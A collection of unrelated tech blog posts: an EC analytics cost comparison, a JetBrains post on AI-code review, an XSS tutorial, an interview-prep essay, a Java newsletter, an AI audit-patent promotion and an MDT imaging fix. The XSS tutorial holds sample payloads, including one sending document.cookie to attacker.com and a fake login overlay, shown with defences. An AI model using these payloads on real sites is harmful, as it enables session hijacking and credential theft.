Layer 1 — Opportunity cost. Forty hours building Matomo is forty hours not running creative A/B tests or shipping LP improvements. For JPY-10M-monthly EC, that’s roughly 25% of a working month redirected away from revenue work. The TCO row “build hours = ¥200K” is the direct cost; the indirect cost (campaigns not run, pages not improved) is often larger.

Layer 2 — Learning curve. Matomo’s admin surface is dense; custom report authoring is close to writing SQL by hand. GA4 demands real care around event design, custom dimensions, and the data layer. Looker Studio adds calculated-field syntax (DAX-adjacent) plus BigQuery SQL knowledge if you take the connector route. Each one has a real ramp before the dashboard becomes operational.

Layer 3 — Upgrade churn. OSS ships major versions; GA4 breaks API contracts; Looker Studio re-skins UIs. Matomo schema migrations, GA4 export schema changes that retroactively break your queries, Looker chart configs that need re-doing — these arrive a few times a year and don’t fit cleanly into the “monthly ops hours” budget. SaaS providers absorb this churn on your behalf.

Stack the three layers together and the gap between “Matomo at ¥880K” and “RevenueScope at ¥117K” stops looking like a margin choice. It looks like a structurally different cost model.

A 3-question decision framework

For SMB EC operators wondering which side they fall on, three binary questions resolve it in about 60 seconds.

Self-Build vs SaaS — Decision Flow

Q1 — Are you a JPY-10M-50M monthly Shopify / BASE / STORES / EC-CUBE operator? If yes, continue. If under JPY-10M, GA4 + Looker Studio with a hand-built dashboard is usually proportionate. If over JPY-1B, you’re in BI-tool territory (Tableau, Looker, Mode).

Q2 — Do you want engineering and ops hours pointed at revenue work, or at dashboard maintenance? If revenue work, lean toward SaaS. If dashboard work is part of how you want to spend the team, OSS makes sense — and it’s a legitimate choice when you have an in-house philosophy around tooling ownership.

Q3 — Are Revenue, AOV, RPS, CVR, plus Sessions enough? If yes — that’s RevenueScope’s deliberate scope cap (4 core metrics + Sessions = 5 KPI cards). If you need MMM, MTA, margin, LTV, inventory, or in-app ROAS computation, look at full-stack tools (Triple Whale category) instead.

Note: RevenueScope intentionally does not compute ad-spend ROAS in-app. Ad consoles (Meta, Google, TikTok) already surface ROAS natively; calculating it again in a separate tool just doubles the surface area to maintain. Delegating ROAS to the tool best positioned to compute it is a deliberate scope decision.

When self-hosting genuinely makes sense

To be clear about when OSS or DIY is the right answer:

  • Compliance-driven — when first-party customer-data residency on your own servers is a hard requirement (large enterprise, regulated industries)
  • Engineering-rich teams — when in-house engineers are already comfortable with Linux server ops and treat tooling as part of the platform
  • Bespoke metrics — when you need indicators no SaaS will model out of the box, and you want full control over the schema
  • Above JPY-1B/month — at large scale, SaaS per-event pricing can flip; self-hosting can become the cheaper option

For SMB EC with marketing teams of 1-3 and no dedicated engineer, none of these usually apply. That’s the population where the TCO gap matters most — and where a focused SaaS earns its keep by removing the three hidden cost layers entirely.

Closing

“OSS is free” is technically true and operationally misleading. License-fee-zero stops mattering once you count 40 build hours and 6-8 monthly ops hours at ¥5,000/hour. The real question for an SMB EC operator isn’t “free vs paid” — it’s “do I want my team’s hours pointed at revenue work or at dashboard maintenance?”

The full breakdown — per-option TCO math, suitability profiles, and references — is at Matomo / Umami / GA4+Looker Studio Self-Build vs RevenueScope: 1-Year TCO for EC Revenue Dashboards. For the prior post in this series (full-feature SaaS comparison, not self-build), see Triple Whale vs RevenueScope.

Stop Sending IDE-Catchable AI Code Errors to Review

AI coding tools might have handed your developers a productivity gain, but they’ve created a problem for your code review process. Pull request volume is up significantly, and the code arriving for review carries error patterns that weren’t common before generative AI. Yet it’s the same people with the same working hours who are in charge of reviewing it all.

Most engineering leaders are still working out what to do about it. According to our State of Developer Ecosystem 2025 survey of more than 24,000 developers, the dominant pattern is ad hoc: Developers simply use AI tools as they see fit with little governance from above.

Studies report that around 20%–25% of AI code hallucinations are detectable through automated structural and static analysis. Those checks can take place in the environment where the code was written, before a pull request is raised. No governance framework required, no new process layer. 

The case is straightforward: your reviewers’ judgment is a finite resource. Every structural error that reaches review consumes some of it. Every structural error caught earlier doesn’t.

Code review is a decision process – AI just added more decisions

DX’s Q4 2025 data on 51,000 developers showed that daily AI users merge 60% more pull requests per week than light users. A 2025 randomized controlled trial across three enterprise companies found that developers who had access to an AI coding assistant completed 26% more tasks per week than those in the control group without access.

More code arriving at review means more decisions per reviewer per day. That pressure has a measurable cost. Decades before AI coding tools entered the picture, researchers found that review rate was a statistically significant factor in defect removal effectiveness, even after controlling for developer ability. More time spent per line of code reviewed was consistently associated with a greater number of defects found. 

Skill alone couldn’t compensate for rushing. Better tooling should – but tools, including modern AI-assisted ones, have yet to close the gap between what a reviewer sees and what a reviewer needs to know:

  • A 2024 study of a company’s AI code review tool found that even with 73.8% of automated review comments acted on, pull request closure time still increased 42%. The commentary was useful, but the burden was not reduced.
  • In 2025, an empirical study of 16 AI code review tools across more than 22,000 comments discovered that their effectiveness varied widely.
  • A January 2026 study revealed that effective review requires much more than a snapshot of what code was added or removed. Reviewers move between issue trackers, documentation, team discussions, and CI reports to understand what a change means in the codebase they are reviewing.

Review tools continue to leave it to developers to form the big picture. AI has added to that gap, not closed it.

AI is sending a different kind of code to review

A 2025 analysis of more than 500,000 code samples found that AI-generated code carries a distinct error profile: unused constructs, hardcoded values, and higher-risk security vulnerabilities that are more common than in human-written code. A separate 2025 study identified defect categories with no real equivalent in human-written code. 

The error profile is challenging enough. But the way reviewers engage with AI-generated code compounds it. A 2026 study found a blind spot in reviewers: AI-generated pull requests containing nearly twice the code redundancy drew fewer negative reactions from reviewers than human-written ones. Surface-level plausibility appeared to reduce critical engagement.

More volume. New error types. Less scrutiny. What does the delivery data show?

A 7.2% reduction in delivery stability for every 25% increase in AI adoption, according to DORA. They attributed this pattern partly to larger changesets: More code generated means bigger batches at review, and bigger batches have consistently predicted instability. Size is the signal. The defect profile and the scrutiny data suggest what is behind it. 

Have machines catch what machines can

Automated structural and static checks don’t involve human judgment calls. But who is putting those checks in place? Even at organizations with mature engineering practices, structural screening didn’t emerge adequately at the individual level:

  • Google, running LLM-powered code migrations across its codebase, found that reviewers needed to revert AI-generated changes often enough that the organization made a deliberate investment in automated verification to reduce that burden.
  • Uber, processing tens of thousands of code changes weekly, found that AI-assisted development was overloading reviewers and built an automated review system that runs before human reviewers engage.

In both cases, the fix required an organizational decision. Google and Uber chose to do this at the pipeline level – upstream of pull requests.

The right development environment can catch the same category of errors earlier and requires no separate infrastructure. 

Put “no-excuses” structural analysis before the pipeline

According to the 2025 Stack Overflow Developer Survey, developers use an average of 3.6 development environments. Which ones to use is typically their call. They know their languages and workflows. 

As an engineering leader, you should know whether at least one of those environments is running deep, no-excuses checks of AI-generated code against what actually exists across the entire codebase in all languages. Many development environments do not; they rely on language-by-language approximations instead.

The distinction matters more at the organizational level than at the individual level. A developer working in a single language with a well-configured approximation-based setup may not feel the gap. But the quality of structural analysis across a team is only as consistent as the weakest setup in it.

The same studies on AI code hallucinations found that roughly 44% involve errors that no automated check reliably surfaces. That is more than enough for your reviewers to contend with. Protect their capacity for what only they can handle.

For every major language your team uses, there is a JetBrains IDE available to maintain a whole-project-resolved model of your codebase. Any code that lands in the editor – regardless of which AI tool produced it – is checked against that model. For teams that want enforcement both before and in the pipeline, Qodana extends that same inspection depth into CI/CD. 

Your reviewers’ judgment is the resource. Structural screening is how you protect it.

See how JetBrains for Business supports that symbiosis at scale.

XSS Explained: How Attackers Execute JavaScript Inside Your Application

Hook

What if an attacker could execute JavaScript inside your users’ browsers — using nothing more than a comment box?
That’s exactly what Cross-Site Scripting (XSS) enables.

Let’s break down how this actually happens in real applications.

What is XSS?

A typical XSS attack follows a simple flow: the attacker submits a script as input, the application renders it into a page, and a victim’s browser executes it.

Cross-Site Scripting happens when an application renders untrusted user input directly into a web page.
Instead of displaying the input as plain text, the browser interprets it as executable JavaScript.

This allows attackers to run malicious code in another user’s browser — under your application’s trusted domain.

Types of XSS

✔ Stored XSS
The attacker submits malicious input, the application stores it in its database, and every user who later loads the page executes it.
Example scenario: a comment section.

✔ Reflected XSS
The input arrives in the request (URL or form) and is reflected back immediately in the response (see the URL sketch after this list).
Example: a search page.

✔ DOM-based XSS
No server involvement: client-side JavaScript inserts attacker-controlled data into the DOM.

While these types differ in how the payload is delivered, the core issue is the same: untrusted input is executed as code.
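
For instance, a reflected payload for that search page could travel in the URL itself (hypothetical endpoint):

https://example.com/search?q=<script>alert('XSS')</script>

Anyone who follows a crafted link like this runs the script in their own session.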

Practical Example

❌ Vulnerable Example (Java/JSP)

String comment = request.getParameter("comment");
saveComment(comment);

Later rendered:

<div><%= comment %></div>

The application assumes the comment is harmless text. But the browser has no way to know that.

💥 Attack Input

<script>alert('XSS')</script>

When rendered:

<div><script>alert('XSS')</script></div>

The browser cannot distinguish legitimate code from attacker-injected code, so instead of displaying text, it executes the JavaScript.

Escalating the Attack (Attacker Mindset)

Cookie Theft Example

<script>
fetch("https://attacker.com/steal?cookie=" + document.cookie);
</script>

This sends the victim’s session cookies to the attacker. If session cookies are not protected, the attacker may hijack active sessions. It works because browsers automatically include cookies with requests to the same domain.
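
A direct mitigation for this particular theft is flagging the session cookie HttpOnly, which hides it from document.cookie (an illustrative header; exact attributes depend on your stack):

Set-Cookie: JSESSIONID=abc123; HttpOnly; Secure; SameSite=Lax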

Fake Login Form

<script>
document.body.innerHTML =
'<h2>Session Expired</h2><input placeholder="Password">';
</script>

The attacker replaces the page content with a fake UI, and users unknowingly enter their credentials.

Real Impact

Session hijacking

Attacker steals authenticated session.

Account takeover

Victim account accessed without password.

Data theft

Sensitive page data can be extracted.

Phishing inside the app

This is especially dangerous because users trust your domain: they are far more likely to fall for fake prompts that appear inside a legitimate application they already trust.

The dangerous part about XSS is that it doesn’t attack your backend — it exploits the trust between your application and your users.

How to Prevent XSS

✅ Output Encoding

Escape special characters: convert < to &lt;, > to &gt;, and so on.

👉 Key idea: treat user input as data, not HTML.

Unsafe:
<div><%= userInput %></div>

Safe:
<div><c:out value="${userInput}" /></div>

Special characters become text: <script> becomes visible text instead of executable code.

Method    Browser Sees (Source Code)            Browser Does
<c:out>   &lt;script&gt;evil()&lt;/script&gt;   Displays literal text on screen.
<%= %>    <script>evil()</script>               Executes the script immediately.

✅ Framework Protection

Modern frameworks escape by default.
React (safe)
<div>{userInput}</div>

Dangerous
<div dangerouslySetInnerHTML={{ __html: userInput }} />

Usually, when you render data in React using curly braces {userContent}, React automatically escapes the content. This means it treats everything—including HTML tags—as literal text, preventing malicious scripts from executing.

When you use dangerouslySetInnerHTML, you are telling React to skip that protection and inject the raw string directly into the DOM.
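
If you genuinely need to render user-supplied HTML, sanitize it first. One common approach is the DOMPurify library (a sketch, not the only option):

import DOMPurify from "dompurify";

const clean = DOMPurify.sanitize(userInput);  // strips scripts and event handlers

<div dangerouslySetInnerHTML={{ __html: clean }} />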

✅ Content Security Policy

Restrict script execution:

Content-Security-Policy: default-src 'self'; script-src 'self';

Even if script injection happens, the browser blocks unauthorized script execution.
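
If you can’t change server headers, the same policy can also be declared in markup, though the HTTP header form is preferred and some directives only work as headers:

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">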

Common Mistakes

Trusting user input

Never assume users behave correctly.

Using innerHTML

Unsafe:
element.innerHTML = userInput;
Safe:
element.textContent = userInput;

Disabling escaping

Framework protections exist for a reason.

Final Thoughts

Think like an attacker:

Ask:

  • Can I inject script here?
  • Will the browser execute it?
  • Can I steal trust from this page?

XSS is dangerous because it doesn’t attack your server directly — it attacks your users through your application.

If your application renders user input without proper encoding, you’re handing attackers control of your users’ browsers.

In XSS, the attacker doesn’t break your system — they use it against your users.

Always treat user input as data — never as code.

AlgoExpert vs NeetCode: The Interview Skill Neither One Actually Trains

A few years back I worked through both AlgoExpert and NeetCode while preparing for interviews. The 100 polished videos and the 400+ free walkthroughs were useful for what they covered. The interview round that broke me wasn’t a problem either platform had skipped. It was a problem they both had a clean walkthrough for, where I could read either solution after the round and recognise the technique, but in 25 minutes against a whiteboard I couldn’t see it.

The problem was Longest Palindromic Substring. Both platforms have a video. Both derive expand around centre cleanly. After watching either, the technique makes sense. The issue was the interviewer didn’t say “this is a palindrome expansion problem.” The prompt said “find the longest substring that reads the same forwards and backwards.” That gap, between the technique I could follow on a video and the technique I could spot from a description, is what neither platform set out to train.

TL;DR: AlgoExpert wins on video depth per problem. NeetCode wins on breadth and free access. Both teach how techniques work after you’ve named the technique. Neither teaches the recognition before the technique gets named, and that recognition is what an unseen medium problem tests.

What AlgoExpert is good at

Clement’s videos are clean. There’s no other word for them. He picks 100 problems, records each one, walks brute force to optimal in a consistent visual style, and the editing makes the reasoning easy to follow. The single instructor consistency is underrated. After three videos you’ve adapted to his vocabulary, his pacing, and his shorthand for tradeoffs. From video four onward you spend less time adapting and more time absorbing.

The browser IDE inside AlgoExpert is also the best of any platform I tried that leads with video. After watching the walkthrough you have a workspace already loaded with the function signature, the tests, and the language template. The transition from passive watching to active solving costs you no setup, which matters more than it sounds.

The bundle is the other thing the platform gets right. SystemsExpert and FrontendExpert sit beside AlgoExpert under one account. If you’re prepping across DSA, system design, and frontend rounds, paying once for three coordinated curriculums is a real saving in cognitive load alone. The argument that “100 problems is too few” misses what AlgoExpert is going for. The platform aims for depth on a small set, not coverage of everything. On that goal it lands.

What NeetCode does well

NeetCode’s free tier is the best reason to start there. The YouTube channel covers more problems than most paid platforms, and the production quality has improved year over year. NeetCode 150 is the most widely shared curated list in the prep community for a reason. You get a defensible problem ordering without any commitment.

The community momentum is the second thing NeetCode does that almost nobody else matches. Engineers swap solutions in the YouTube comments, swap timelines on the subreddit, swap notes in Discord. Studying alone is the failure mode for most preparation. A platform that pulls you into a group of people preparing in parallel is doing real work, even if the work isn’t a feature on a comparison sheet.

The mapping to LeetCode is also worth naming. The problems you practise on NeetCode are the same problems Big Tech screening tools serve, which means your practice environment matches your screening environment. AlgoExpert’s IDE is more polished, but NeetCode’s environment matches what you’ll actually face when a recruiter sends you a Codility or HackerRank link.

The shared gap, made concrete

Take Longest Palindromic Substring. The interview prompt is one sentence: given a string, return the longest substring that reads the same forwards and backwards. AlgoExpert’s video derives expand around centre cleanly. NeetCode’s video does the same with a slightly different style. Watch either and the solution makes sense.

What neither video sets you up to do is the move that happens before the technique gets named. The move is reading the prompt, noticing that a substring is being asked for, noticing the symmetry constraint, and reaching for expand around centre rather than DP because of those two visible features. In an interview, no one labels the problem for you. Your search for a technique starts from the description, not from a category tag.

The pattern repeats across topics. Take a tree problem like Binary Tree Maximum Path Sum. Both platforms have walkthroughs. After watching either you can reproduce the postorder helper that returns the local max while updating a global. What neither walkthrough installs is the recognition that “any node, any path, any direction” signals the helper-with-side-effects pattern. The walkthrough teaches the pattern. The recognition is a separate skill the walkthrough assumes you’ll pick up by exposure.

What recognition is, mechanically

Recognition is a small set of features you can name on the prompt before any code is written. For expand around centre, the features are roughly:

  1. The output is a substring of a string.
  2. The constraint involves symmetry, palindromes, or some “reads the same in both directions” property.
  3. Other approaches bottom out at quadratic, so the technique you’re looking for is O(n^2) or O(n log n), not O(n) or sub-linear.

When all three apply, expand around centre is the candidate technique to try. Longest Palindromic Substring matches all three. Palindromic Substrings (count, not length) matches the first two. Both fall under the same recognition rule.
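
To make that concrete, here is a minimal expand-around-centre sketch in Python, my own illustration rather than either platform’s reference solution:

def longest_palindromic_substring(s: str) -> str:
    best = ""
    for i in range(len(s)):
        # Two centres per index: odd-length (i, i) and even-length (i, i + 1)
        for left, right in ((i, i), (i, i + 1)):
            while left >= 0 and right < len(s) and s[left] == s[right]:
                left -= 1
                right += 1
            candidate = s[left + 1:right]  # the while loop overshoots by one on each side
            if len(candidate) > len(best):
                best = candidate
    return best

print(longest_palindromic_substring("babad"))  # "bab" (or "aba")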

This is the part neither AlgoExpert nor NeetCode targets directly. Their walkthroughs assume you’ve already arrived at the technique, then explain it. The arriving is the work no one is helping you do.

Why volume alone doesn’t close it

The cognitive science name for this is the generation effect. Producing an answer from first principles, even imperfectly, builds stronger memory and stronger transfer than recognising a familiar solution. Watching a walkthrough builds recognition of an answer you’ve been shown. Interviews ask for generation, where you produce the technique from a description you haven’t seen.

What you watch and what you generate aren’t the same skill. Watching ten variants of expand around centre gives you a strong recognition memory for variants close to what you watched. The interview problem is rarely close enough. It tends to look just different enough that the recognition memory misses, and you stall on what to try next.

The transfer of learning literature splits this into near transfer and far transfer. Near transfer is solving problems that look like ones you’ve already solved. Far transfer is reasoning through problems that look different but follow the same underlying pattern. Volume in the AlgoExpert / NeetCode mode produces near transfer reliably. Far transfer comes from a different practice shape, where the recognition gets trained on its own.

A recognition protocol you can run this week

If you’ve worked through either platform’s content and unfamiliar problems still freeze you, the move isn’t another fifty walkthroughs. It’s a tighter loop on recognition first.

  1. Pick one technique a week. Expand around centre, sliding window, two pointer, monotonic stack, postorder with side effects.
  2. Write down the trigger features for that technique. Three or four specific features you can see in a problem statement that, when they all apply, make this technique the candidate. Write them in your own words, not from a cheat sheet.
  3. Read five problems that use this technique without solving them. For each, name the triggers you can see in the prompt before reading any constraints in detail.
  4. Solve three or four problems on the technique with the problem name and category tag hidden. The cover-the-name move is what forces you to recognise the technique before coding starts.
  5. Once a week, do one pressure session. Cover the title, set 25 minutes, talk through your reasoning out loud, and don’t open the IDE until you’ve named the technique you intend to use.

A technique a week means eight or ten weeks of focused work. That replaces the hundred-plus-problem grind where the signal you actually need gets buried under details that don’t matter.

Both AlgoExpert and NeetCode are reasonable choices for the watching part of this loop. Once you’ve watched the technique once or twice, the work that compounds is the recognition reps the walkthroughs don’t include.

If you’ve already watched hundreds of walkthroughs but still freeze on unfamiliar problems, the gap usually isn’t knowledge.

It’s recognition.

I wrote a longer breakdown comparing AlgoExpert and NeetCode on:

  • depth vs breadth
  • passive watching vs active recall
  • the recognition drills that finally fixed this for me

When did the recognition click for a pattern you used to watch and re-watch without spotting on a fresh problem, and what was the specific problem that broke it open?

Java Annotated Monthly – May 2026

April flew by. The pace of tech development didn’t slow, and the flow of news and knowledge didn’t either.

This month, Emily Bache joins us to share some sharp finds about AI agents and test-driven development. Java stays busy with fresh updates and practical tips, and Kotlin keeps pushing forward right next to it. The AI section is, as usual, packed with things worth your attention.

You’ll also find upcoming events to plan for and a few ideas to challenge your thinking.

Featured Content 

Emily Bache

Emily Bache is an independent consultant, YouTuber, author, and Technical Coach, with over 25 years of experience working with Java and other programming languages and tools. She works with developers, training and coaching effective agile practices like refactoring and test-driven development. Emily has written two books about software development and contributed to several others. Emily founded the Samman Technical Coaching Society in order to promote technical excellence and support coaches everywhere.

It’s my pleasure to bring to your attention some interesting content that appeared in April. The huge change that is sweeping through our industry right now is the adoption of AI coding agents, which many people are using instead of hand-coding changes to software. One of the most important new skills to master is designing a “harness” for your AI tool, and this month Birgitta Böckeler has published the best reference I’ve seen so far about what that is and a mental model for how to think about it. Chris Parsons has also published an extensive guide titled How I use AI to Code, which is a really great resource for experienced developers looking to create their own harness and mentor others to do the same.

Perhaps as a contrast, I’d also like to highlight Michael Taggart’s introspective experience report on his use of AI. He wrestles with his conscience over using these tools at all. An interesting metaphor for AI-assisted coding came up in an article by Drew Breunig – we run the risk of building a Winchester Mystery House. After you read that, listen to Kevlin Henney’s talk Being the Human in the Loop, where he takes a look at the engineering skills we still need – ones that could perhaps prevent the kind of thing Drew writes about from happening. 

I have a particular interest in test-driven development, which, as a technical coach, is a big part of what I teach to others. I wrote an initial assessment of what TDD looks like these days, based on interviews with several practitioners I trust who are all using agentic AI. For those of you who’d like to see me in action writing code, I have a demo of a narrow integration test for an outbound port in a hexagonal architecture, in Kotlin.

Java News

Catch what shipped and track what’s next:

  • Java News Roundup 1, 2, 3, 4
  • Newsletter: Java 26 Is Now Available | JDK 27 Heads-Ups
  • Quality Outreach Heads-up – JDK 27: Obsolete Translation Resources Removed
  • Update Your JDK, Read More Code, and Talk to Your Users: Interviews From VoxxedDays Amsterdam (#93)

Java Tutorials and Tips

Steal these tricks:

  • Analysing Crashed JVMs – Inside Java Newscast #109
  • Oracle’s Java Verified Portfolio and JavaFX: What It Actually Means
  • 10 Things I Hate About Java by Adele Carpenter
  • Is AI Ruining Java Open Source? – Andres Almiray | The Marco Show
  • Java 26: Updates You Must Know
  • Java and Gen AI: JVM Agents With Embabel by Rod Johnson (Spring Creator)
  • A Bootiful Podcast: Java Developer Advocate Ana-Maria Mihalceanu
  • Does Java Really Use Too Much Memory? Let’s Look at the Facts (JEPs)
  • Thread-Safe Native Memory in Java: VarHandle Access Modes Explained
  • Episode 54 “How JDK 26 Improves G1’s Throughput” [AtA]
  • You Must Avoid Final Field Mutation – Inside Java Newscast #110
  • How the JVM Optimizes Generic Code
  • The Curious Case of Enum and Map Serialization
  • Avoiding Final Field Mutation

Kotlin Corner

  • Kotlin kontra Java – Part 1 – Ecosystem
  • Kotlin Professional Certificate by JetBrains – Now on LinkedIn Learning
  • Introducing Koog Integration for Spring AI: Smarter Orchestration for Your Agents
  • Reliable AI Agents Using Domain Modeling With Koog in Java

AI 

Cut the hype, test the tools, and boost your flow: 

  • How We Built a Java AI Agent by Connecting the Dots the Ecosystem Already Had
  • Stateful Continuation for AI Agents: Why Transport Layers Now Matter
  • A Bootiful Podcast: Mark Kropf on AI Orchestration
  • Embabel Tools & MCP Servers: Supercharge Your Java AI Agents
  • Adversarial AI: Understanding the Threats to Modern AI Systems
  • Why Java Developers Over-Trust AI Dependency Suggestions
  • A GitHub Agentic Workflow 
  • ACP Java SDK: Building IDE Agents in Java 
  • Spring AI Agentic Patterns (Part 7): Session API – Event-Sourced Short-Term Memory with Context Compaction
  • Beyond RAG: Architecting Context-Aware AI Systems With Spring Boot 
  • Spring AI Agentic Patterns (Part 6): AutoMemoryTools – Persistent Agent Memory Across Sessions 
  • 5 Best Practices for Working with AI Agents, Subagents, Skills, and MCP 
  • Deepfakes, Disinformation, and AI Content Are Taking Over the Internet
  • MCP in the Java World: Bringing Architectural Strategy to LLM Integrations

Languages, Frameworks, Libraries, and Technologies

Explore new tools and technologies, and revisit the old ones:

  • This Week in Spring 1, 2, 3, 4
  • Article: Beyond RAG: Architecting Context-Aware AI Systems With Spring Boot
  • Six and a Half Ridiculous Things to Do With Quarkus
  • The Spring Team on Spring Framework 7 and Spring Boot 4
  • A Bootiful Podcast: The Legendary Craig Walls
  • Enabling Reflection-Free Jackson Serializers by Default 
  • Understanding Performance 
  • A Bootiful Podcast: Dr. Venkat Subramaniam and James Ward on Intelligent Kotlin and So Much More
  • The Road to Docker Official Images for Java: The Azul Zulu Story
  • Spring Debugger New Power: Where Should I Click to Demystify Spring Boot Magic?

Conferences and Events

Join the crowd online or offline:

  • JAX – Mainz, Germany or Online, May 4–8
  • Devoxx UK – London, United Kingdom, May 6–7; JetBrains will have a booth at the event. Also, come and listen to our JetBrains speakers: Marit van Dijk, Cheuk Ting Ho, and Simon Vergauwen. The Spring documentary will premiere there, followed by a panel with Josh Long, Steve Poole, and Marit van Dijk.
  • GeeCon – Kraków, Poland, May 14–15; Marit van Dijk is speaking and moderating a Java panel where the panelists will discuss what excites them most about Java in 2026.
  • JAlba – Edinburgh, Scotland, May 14–16
  • JNation Conference – Coimbra, Portugal, May 26–27; Anton Arhipov and Marit van Dijk from JetBrains are the speakers. 
  • JCON Slovenia – Portorož, Slovenia, May 27–29

Culture and Community

Where do you stand on these topics?

  • Panel: Building a Culture That Works
  • How to Do What You Love and Make Good Money 
  • Do Things That Don’t Scale 
  • Encoding Team Standards 
  • Beyond the Hype: Is AI Taking the Fun out of Software Development? 

And Finally…

One last thing before you close the article. Don’t skip it!

  • Using Spring Data JPA With Kotlin
  • Using Spring Data JDBC With Kotlin
  • Speeding up Interactive Rebase in JetBrains IDEs
  • From Java to Wayland: A Pixel’s Journey

That’s it for today! We’re always collecting ideas for the next Java Annotated Monthly – send us your suggestions via email or X by May 20. And don’t forget to check out our archive of past JAM issues for any articles you might have missed!

Five Eyes published the policy on 1 May. Mickai filed the engineering 4 weeks earlier.

Cross-posted from mickai.co.uk.

On 1 May 2026, the Five Eyes intelligence alliance (UK NCSC, US CISA, Australia ASD, Canada CCCS, New Zealand NCSC NZ) issued joint guidance on Agentic AI security. The headline findings: AI agents need verifiable identity, signed audit trails, and cryptographic attestation of behaviour.

Four weeks earlier, on 4 April 2026, I (Micky Irons) filed UK patent application GB2610413.3 at the Intellectual Property Office: the Open Inter-Vendor Audit Record (OAR) format. Twenty claims. The same engineering primitive the Five Eyes guidance describes, only it is already in the public patent record.

The OAR primitive in plain English

Every action an AI agent takes (prompt received, tool call dispatched, model invoked, memory written, response emitted) is captured as an Audit Record. Each record is:

  • Cryptographically signed with a hardware-bound key (post-quantum, ML-DSA-65, FIPS 204).
  • Chained to the previous record so tampering breaks the chain.
  • Vendor-portable. The record format is open. A regulator, an auditor, or the user can verify the chain without depending on the vendor that produced it.

That last property is the policy hook. Five Eyes asked: how does a defender prove what an agent did? OAR’s answer: read the chain, verify the signatures, done. No vendor cooperation required.
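
To make the chaining concrete, here’s a toy Python sketch of the general hash-chain idea only. It is not the OAR format itself, and it substitutes a bare SHA-256 link for the hardware-bound ML-DSA-65 signatures real records would carry:

```python
import hashlib
import json

def record_digest(record: dict) -> str:
    # Canonical JSON so the same record always hashes the same way.
    return hashlib.sha256(json.dumps(record, sort_keys=True).encode()).hexdigest()

def append_record(chain: list, action: dict) -> None:
    prev = record_digest(chain[-1]) if chain else "0" * 64
    # A real OAR-style record would also sign this link with a
    # hardware-bound key (ML-DSA-65 under FIPS 204), not just hash it.
    chain.append({"action": action, "prev": prev})

def verify_chain(chain: list) -> bool:
    prev = "0" * 64
    for record in chain:
        if record["prev"] != prev:  # any upstream edit breaks every later link
            return False
        prev = record_digest(record)
    return True

chain: list = []
append_record(chain, {"event": "prompt_received"})
append_record(chain, {"event": "tool_call", "tool": "search"})
assert verify_chain(chain)
chain[0]["action"]["event"] = "tampered"  # mutate an early record
assert not verify_chain(chain)            # verification now fails
```

Once records are linked this way, editing any earlier record invalidates every later link, which is what lets a third party check the history without the producing vendor’s help.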

Why “4 weeks earlier” matters

Filing dates at the UK IPO are immutable public record. GB2610413.3 has a UK IPO filing date of 4 April 2026. The Five Eyes guidance is dated 1 May 2026. Anyone can verify both dates independently.

This is not a coincidence. Mickai’s broader portfolio is 31 UK patent applications and 914 claims, all named to Mickarle Wagstaff-Irons (Micky Irons, the founder), all filed without external counsel via the UK IPO’s no-fee Apply for a Filing Date route. The work was done before the policy was written, because the policy was the obvious next step once the engineering existed.

What changes for builders

If you are shipping an agent today and you want to be ready for the regulatory wave that the Five Eyes guidance is about to trigger, the OAR primitive gives you three properties:

  1. Verifiability without vendor lock-in. Your customers can audit your agents without your help.
  2. Post-quantum readiness. ML-DSA-65 is a parameter set of ML-DSA, the FIPS 204 standard. Quantum-resistant from day one.
  3. Hardware-bound identity. Keys live in TPM / Secure Enclave / TrustZone, not in environment variables.

The full architecture is documented at mickai.co.uk. The article that pegs this to the Five Eyes news is here:

Five Eyes Published the Policy. Mickai Filed the Engineering.

Mickai is a sovereign AI operating system built in Workington, Cumbria, by Micky Irons. 31 UK patent applications, 914 claims. No cloud round-trip. No telemetry. Sovereign by default.

Debugging the Deployment Pipeline (When the MDT Image Goes Ghost)

They call me a Support Tech, but I see myself as a Value Architect. I don’t just “install apps”—I engineer the logic that makes them deploy at scale. Recently, my flow was interrupted when our MDT image decided to stop cooperating. What should have been a routine laptop setup quickly turned into a high-stakes deep dive into systems integrity and deployment architecture.

The Glitch: The Logic Break
I was preparing to image a batch of fresh laptops when the process hit a wall. The machine couldn’t find a bootable partition to start from, and Disk Management showed the deployment drive as “Unallocated”.

  • The Problem: The partition structure on the MDT deployment drive was corrupted, leaving nothing bootable.
  • The Stake: High-stakes deployments for the IMEA region were at a complete standstill.

The Systems Logic Fix
Instead of just re-downloading and hoping for a miracle, I treated the failure like a software bug that needed a structural fix:

  • Re-partitioning via Script: I didn’t just format the drive; I used Diskpart to rebuild the partition layout as GPT, the structure modern UEFI firmware and Windows 11 require (see the sketch after this list).
  • Verifying Source Integrity: I navigated back to the source on SharePoint to download a fresh, verified IMEA MDT image. This ensured the “code” I was deploying was clean and optimized from the start.
  • The Result: The “ghost” drive was restored, becoming a perfectly functioning deployment tool once again.
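
For the curious, here’s a rough Python wrapper around the kind of Diskpart script I mean. The disk number, sizes, and labels are illustrative, it has to run elevated, and `clean` destroys everything on the selected disk, so treat this as a sketch rather than a production tool:

```python
import subprocess
import tempfile

# Illustrative Diskpart script: wipes disk 1 and rebuilds a GPT/UEFI
# layout (EFI System Partition + MSR + NTFS data partition).
DISKPART_SCRIPT = """\
select disk 1
clean
convert gpt
create partition efi size=100
format quick fs=fat32 label=System
create partition msr size=16
create partition primary
format quick fs=ntfs label=Deploy
assign
"""

def repartition() -> None:
    # Diskpart reads its commands from a script file passed via /s.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(DISKPART_SCRIPT)
        script_path = f.name
    subprocess.run(["diskpart", "/s", script_path], check=True)

if __name__ == "__main__":
    repartition()
```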

Why This is Software Development
Software development is ultimately about creating repeatable, logical processes. By fixing the MDT pipeline, I wasn’t just fixing one laptop; I was ensuring that every future deployment followed a clean, automated script.

This is the exact mindset I am bringing into Data Science—identifying where a data flow is broken and re-building the pipe for maximum efficiency. Whether you’re writing Python or managing MDT images, the goal is Systems Logic. If the foundation is broken, the software won’t run. Fix the foundation first. ✌️